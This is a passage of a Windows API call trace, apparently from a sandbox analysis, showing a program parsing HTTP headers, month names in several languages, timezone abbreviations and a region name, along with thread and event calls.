dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Range", cchCount2=13) returned 1 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Range", cchCount2=13) returned 3 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Range", cchCount2=13) returned 3 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Range", cchCount2=13) returned 1 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Range", cchCount2=13) returned 1 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Range", cchCount2=13) returned 3 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Range", cchCount2=13) returned 1 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Range", cchCount2=13) returned 1 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Range", cchCount2=13) returned 3 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Range", cchCount2=13) returned 1 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Date", cchCount2=4) returned 2 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mon", cchCount1=3, lpString2="SUN", cchCount2=3) returned 1 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mon", cchCount1=3, lpString2="MON", cchCount2=3) returned 2 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JAN", cchCount2=3) returned 1 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FEB", cchCount2=3) returned 1 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAR", cchCount2=3) returned 1 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="APR", cchCount2=3) returned 1 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAY", cchCount2=3) returned 1 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUN", cchCount2=3) returned 1 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUL", cchCount2=3) returned 1 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AUG", cchCount2=3) returned 1 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEP", cchCount2=3) returned 1 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OCT", cchCount2=3) returned 1 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="NOV", cchCount2=3) returned 1 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DEC", cchCount2=3) returned 1 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUNE", cchCount2=4) returned 1 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JULY", cchCount2=4) returned 1 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MRZ", cchCount2=3) returned 1 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DEZ", cchCount2=3) returned 1 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="ENO", cchCount2=3) returned 1 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FBRO", cchCount2=4) returned 1 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MZO", cchCount2=3) returned 1 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AB", cchCount2=2) returned 1 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AGTO", cchCount2=4) returned 1 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SBRE", cchCount2=4) returned 1 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OBRE", cchCount2=4) returned 1 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="NBRE", cchCount2=4) returned 1 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DBRE", cchCount2=4) returned 1 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MRT", cchCount2=3) returned 1 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MEI", cchCount2=3) returned 1 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JANV", cchCount2=4) returned 1 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FÉV", cchCount2=3) returned 1 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MARS", cchCount2=4) returned 1 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AVR", cchCount2=3) returned 1 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUIN", cchCount2=4) returned 1 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUIL", cchCount2=4) returned 1 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AOÛ", cchCount2=3) returned 1 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DÉC", cchCount2=3) returned 1 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FÉVR", cchCount2=4) returned 1 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUI", cchCount2=3) returned 1 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AOÛT", cchCount2=4) returned 1 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAJ", cchCount2=3) returned 1 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AVG", cchCount2=3) returned 1 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="JAN", cchCount2=3) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="FEB", cchCount2=3) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="MAR", cchCount2=3) returned 2 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="A", cchCount2=1) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACDT", cchCount2=4) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACST", cchCount2=4) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACT", cchCount2=3) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ADT", cchCount2=3) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEDT", cchCount2=4) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEST", cchCount2=4) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AFT", cchCount2=3) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKDT", cchCount2=4) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKST", cchCount2=4) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMST", cchCount2=4) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMST", cchCount2=4) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMT", cchCount2=3) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMT", cchCount2=3) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ART", cchCount2=3) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AST", cchCount2=3) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AST", cchCount2=3) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWDT", cchCount2=4) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWST", cchCount2=4) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AZOST", cchCount2=5) returned 3 [0103.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AZT", cchCount2=3) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="B", cchCount2=1) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BDT", cchCount2=3) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BIOT", cchCount2=4) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BIT", cchCount2=3) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BOT", cchCount2=3) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BRT", cchCount2=3) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BST", cchCount2=3) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BST", cchCount2=3) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BTT", cchCount2=3) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="C", cchCount2=1) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CAT", cchCount2=3) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CCT", cchCount2=3) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEDT", cchCount2=4) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEST", cchCount2=4) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CET", cchCount2=3) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHADT", cchCount2=5) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHAST", cchCount2=5) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHOT", cchCount2=4) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ChST", cchCount2=4) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHUT", cchCount2=4) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CIST", cchCount2=4) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CIT", cchCount2=3) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CKT", cchCount2=3) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CLST", cchCount2=4) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CLT", cchCount2=3) returned 3 [0103.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="COST", cchCount2=4) returned 3 [0103.295] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19faa8 | out: lpTimeZoneInformation=0x19faa8) returned 0x1 [0103.295] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x3f0 [0103.295] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4 [0103.295] GetLocalTime (in: lpSystemTime=0x19fb98 | out: lpSystemTime=0x19fb98*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x2d1)) [0103.295] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19f9b0 | out: lpTimeZoneInformation=0x19f9b0) returned 0x1 [0103.295] GetLocalTime (in: lpSystemTime=0x19fb6c | out: lpSystemTime=0x19fb6c*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x2d1)) [0103.295] GetCurrentThreadId () returned 0x1358 [0103.295] GetCurrentThreadId () returned 0x1358 [0103.295] GetCurrentThreadId () returned 0x1358 [0103.295] GetCurrentThreadId () returned 0x1358 [0103.295] ResetEvent (hEvent=0x3f0) returned 1 [0103.295] GetCurrentThreadId () returned 0x1358 [0103.295] GetCurrentThreadId () returned 0x1358 [0103.295] GetCurrentThreadId () returned 0x1358 [0103.295] ResetEvent (hEvent=0x3f0) returned 1 [0103.295] GetLocalTime (in: lpSystemTime=0x19fb80 | out: lpSystemTime=0x19fb80*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x2d1)) [0103.295] GetCurrentThreadId () returned 0x1358 [0103.295] GetCurrentThreadId () returned 0x1358 [0103.295] SetEvent (hEvent=0x3f4) returned 1 [0103.295] SetEvent (hEvent=0x3f0) returned 1 [0103.295] GetCurrentThreadId () returned 0x1358 [0103.296] GetCurrentThreadId () returned 0x1358 [0103.296] GetCurrentThreadId () returned 0x1358 [0103.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="HEAD", cchCount2=4) returned 1 [0103.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="HEAD", cchCount2=4) returned 1 [0103.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="HEAD", cchCount2=4) returned 1 [0103.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="HEAD", cchCount2=4) returned 1 [0103.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=10, lpString2="text/html", cchCount2=9) returned 3 [0103.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=10, lpString2="text/html-sandboxed", cchCount2=19) returned 3 [0103.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=10, lpString2="application/xhtml+xml", cchCount2=21) returned 3 [0103.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=10, lpString2="application/xml", cchCount2=15) returned 3 [0103.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=10, lpString2="application/xml-external-parsed-entity", cchCount2=38) returned 3 [0103.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=10, lpString2="application/xml-dtd", cchCount2=19) returned 3 [0103.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=5, lpString2="text/", cchCount2=5) returned 2 [0103.296] LoadStringW (in: hInstance=0x400000, uID=0xfebf, lpBuffer=0x19db68, cchBufferMax=4096 | out: lpBuffer="Chunk Started") returned 0xd [0103.296] GetTickCount64 () returned 0x115b1e7 [0103.296] GetTickCount64 () returned 0x115b1e7 [0103.296] GetTickCount64 () returned 0x115b1e7 [0103.296] GetTickCount64 () returned 0x115b1e7 [0103.296] select (in: nfds=0, readfds=0x19fa88, writefds=0x0, exceptfds=0x0, timeout=0x19fa70*(tv_sec=0, tv_usec=0) | out: readfds=0x19fa88, writefds=0x0, exceptfds=0x0) returned 0 [0103.296] select (in: nfds=0, readfds=0x19fa88, writefds=0x0, exceptfds=0x0, timeout=0x19fa70*(tv_sec=0, tv_usec=0) | out: readfds=0x19fa88, writefds=0x0, exceptfds=0x0) returned 0 [0103.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="keep-alive", cchCount1=10, lpString2="CLOSE", cchCount2=5) returned 3 [0103.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="CLOSE", cchCount2=5) returned 1 [0103.296] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x242e938, cbMultiByte=22, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0103.296] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x242e938, cbMultiByte=22, lpWideCharStr=0x24bc56c, cchWideChar=22 | out: lpWideCharStr="North Rhine-Westphalia") returned 22 [0103.296] GetCurrentThreadId () returned 0x1358 [0103.296] GetCurrentThreadId () returned 0x1358 [0103.296] GetCurrentThreadId () returned 0x1358 [0103.296] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] 